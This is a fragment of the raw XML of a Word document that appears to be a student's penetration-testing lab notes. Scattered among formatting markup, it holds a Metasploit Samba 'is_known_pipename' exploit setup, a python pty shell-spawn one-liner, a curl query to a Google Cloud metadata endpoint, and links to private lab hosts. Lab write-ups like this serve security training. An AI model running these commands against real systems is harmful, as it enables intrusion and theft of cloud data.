        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/samba/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009521A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is_known_pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BD76B09" w14:textId="70257665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RPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5E5122" w14:textId="344F0E1F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set RHOSTS 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B69407" w14:textId="1E51E689" w:rsidR="009521A1" w:rsidRDefault="009521A1" w:rsidP="009521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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4705C7E5" w14:textId="470EE245" w:rsidR="00CA123C" w:rsidRDefault="00CA123C" w:rsidP="00CA123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26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">python3.6 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210B3E05" w14:textId="2B60BE56" w:rsidR="0075727D" w:rsidRDefault="0075727D" w:rsidP="0075727D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3972BBBD" w14:textId="72F55EFB" w:rsidR="0075727D" w:rsidRPr="0075727D" w:rsidRDefault="0075727D" w:rsidP="0075727D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0075727D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl "http://metadata.google.internal/computeMetadata/v1/projects/en2720-2017/repos/twmn_sourcerepo_en2720-w11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0075727D" w:rsidRPr="0075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AAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C994A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50421"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B3E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4F78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4F84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595215">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1075779853">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="171647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55"/>
    <w:rsid w:val="00004668"/>
    <w:rsid w:val="00006AEF"/>
    <w:rsid w:val="00014378"/>
    <w:rsid w:val="00022A6A"/>
    <w:rsid w:val="000347B6"/>
    <w:rsid w:val="00086D97"/>
    <w:rsid w:val="000A644E"/>
    <w:rsid w:val="000D65B3"/>
    <w:rsid w:val="000E0E83"/>
    <w:rsid w:val="00117E96"/>
    <w:rsid w:val="00136246"/>
    <w:rsid w:val="00143994"/>
    <w:rsid w:val="00162B93"/>
    <w:rsid w:val="0016576B"/>
    <w:rsid w:val="0016757F"/>
    <w:rsid w:val="001752A1"/>
    <w:rsid w:val="00181A87"/>
    <w:rsid w:val="00181E25"/>
    <w:rsid w:val="00194E82"/>
    <w:rsid w:val="001B5504"/>
    <w:rsid w:val="001E6AC9"/>
    <w:rsid w:val="002057A9"/>
    <w:rsid w:val="00245CEC"/>
    <w:rsid w:val="00263EE8"/>
    <w:rsid w:val="00266E78"/>
    <w:rsid w:val="00294DDC"/>
    <w:rsid w:val="002B38C3"/>
    <w:rsid w:val="002C44A0"/>
    <w:rsid w:val="002D7136"/>
    <w:rsid w:val="002E09B1"/>
    <w:rsid w:val="002F2626"/>
    <w:rsid w:val="00301FB3"/>
    <w:rsid w:val="0036395C"/>
    <w:rsid w:val="003C0804"/>
    <w:rsid w:val="003D6002"/>
    <w:rsid w:val="003F3761"/>
    <w:rsid w:val="00401BB4"/>
    <w:rsid w:val="00420E31"/>
    <w:rsid w:val="00421067"/>
    <w:rsid w:val="00450EE6"/>
    <w:rsid w:val="00451D8B"/>
    <w:rsid w:val="0045509B"/>
    <w:rsid w:val="004915D6"/>
    <w:rsid w:val="004B0558"/>
    <w:rsid w:val="004C0D91"/>
    <w:rsid w:val="004C6776"/>
    <w:rsid w:val="004D03DA"/>
    <w:rsid w:val="004D2E7A"/>
    <w:rsid w:val="004E7717"/>
    <w:rsid w:val="00502E1F"/>
    <w:rsid w:val="005274B8"/>
    <w:rsid w:val="00531A9A"/>
    <w:rsid w:val="00535995"/>
    <w:rsid w:val="00541FF3"/>
    <w:rsid w:val="00563280"/>
    <w:rsid w:val="00582AE1"/>
    <w:rsid w:val="00594ECE"/>
    <w:rsid w:val="00594F38"/>
    <w:rsid w:val="005E11BF"/>
    <w:rsid w:val="00600B91"/>
    <w:rsid w:val="0061171C"/>
    <w:rsid w:val="00614BE6"/>
    <w:rsid w:val="006422AB"/>
    <w:rsid w:val="00673827"/>
    <w:rsid w:val="00673F69"/>
    <w:rsid w:val="006825E6"/>
    <w:rsid w:val="006861C1"/>
    <w:rsid w:val="006A7E21"/>
    <w:rsid w:val="006B53A1"/>
    <w:rsid w:val="006B6886"/>
    <w:rsid w:val="006B6F6E"/>
    <w:rsid w:val="006D340A"/>
    <w:rsid w:val="00722428"/>
    <w:rsid w:val="00732331"/>
    <w:rsid w:val="0075727D"/>
    <w:rsid w:val="007A4CBE"/>
    <w:rsid w:val="007B54CB"/>
    <w:rsid w:val="007C1649"/>
    <w:rsid w:val="007C1915"/>
    <w:rsid w:val="007C5BE4"/>
    <w:rsid w:val="007D5165"/>
    <w:rsid w:val="007D5A2A"/>
    <w:rsid w:val="007D7170"/>
    <w:rsid w:val="00812357"/>
    <w:rsid w:val="008206EA"/>
    <w:rsid w:val="00826BE2"/>
    <w:rsid w:val="0083557A"/>
    <w:rsid w:val="008528E8"/>
    <w:rsid w:val="00886058"/>
    <w:rsid w:val="00891649"/>
    <w:rsid w:val="008970CB"/>
    <w:rsid w:val="008A35EC"/>
    <w:rsid w:val="008D55A9"/>
    <w:rsid w:val="008E6989"/>
    <w:rsid w:val="008F009B"/>
    <w:rsid w:val="00904867"/>
    <w:rsid w:val="00905557"/>
    <w:rsid w:val="00917D4C"/>
    <w:rsid w:val="00932412"/>
    <w:rsid w:val="009521A1"/>
    <w:rsid w:val="00955E1D"/>
    <w:rsid w:val="00982CE3"/>
    <w:rsid w:val="009B0D05"/>
    <w:rsid w:val="009D77D4"/>
    <w:rsid w:val="009E50A9"/>
    <w:rsid w:val="00A13346"/>
    <w:rsid w:val="00A41DBB"/>
    <w:rsid w:val="00A54B0C"/>
    <w:rsid w:val="00A83ACD"/>
    <w:rsid w:val="00A845B7"/>
    <w:rsid w:val="00A87275"/>
    <w:rsid w:val="00AD3814"/>
    <w:rsid w:val="00AE7CC4"/>
    <w:rsid w:val="00B60378"/>
    <w:rsid w:val="00B81BA2"/>
    <w:rsid w:val="00B978CD"/>
    <w:rsid w:val="00BC0672"/>
    <w:rsid w:val="00BC7B2E"/>
    <w:rsid w:val="00BE30CD"/>
    <w:rsid w:val="00BF1371"/>
    <w:rsid w:val="00BF7F60"/>
    <w:rsid w:val="00C14450"/>
    <w:rsid w:val="00C15947"/>
    <w:rsid w:val="00C378B1"/>
    <w:rsid w:val="00C960D3"/>
    <w:rsid w:val="00CA123C"/>
    <w:rsid w:val="00CB32D1"/>
    <w:rsid w:val="00CD6E56"/>
    <w:rsid w:val="00D16DF3"/>
    <w:rsid w:val="00D477BF"/>
    <w:rsid w:val="00D54D17"/>
    <w:rsid w:val="00D751EB"/>
    <w:rsid w:val="00D7624F"/>
    <w:rsid w:val="00D7673C"/>
    <w:rsid w:val="00D86C3C"/>
    <w:rsid w:val="00DE2B20"/>
    <w:rsid w:val="00DF0F7A"/>
    <w:rsid w:val="00DF65D3"/>
    <w:rsid w:val="00E11084"/>
    <w:rsid w:val="00E2733A"/>
    <w:rsid w:val="00E74169"/>
    <w:rsid w:val="00E8183E"/>
    <w:rsid w:val="00E92D99"/>
    <w:rsid w:val="00EB5914"/>
    <w:rsid w:val="00F15547"/>
    <w:rsid w:val="00F2181B"/>
    <w:rsid w:val="00F25434"/>
    <w:rsid w:val="00F26FDB"/>
    <w:rsid w:val="00F32553"/>
    <w:rsid w:val="00F53075"/>
    <w:rsid w:val="00F631CD"/>
    <w:rsid w:val="00F717B9"/>
    <w:rsid w:val="00F733D6"/>
    <w:rsid w:val="00F9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78F41"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FCEF5F1D-B8C1-4D2D-A0A7-A120D42C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mailto:lord_nikon@10.0.7.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0.9:8080/dZ4GhhIC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ailto:printer@10.0.2.16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0.0.3.107/php/recherche_old.php" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:ubuntu@10.0.3.107" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.3.107/php/recherche_old.ph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0.0.2.164:8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Marques Dos Santos Belmar Da Costa</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tomás Marques Dos Santos Belmar Da Costa</cp:lastModifiedBy>
  <cp:revision>146</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-12T17:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-10-17T16:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>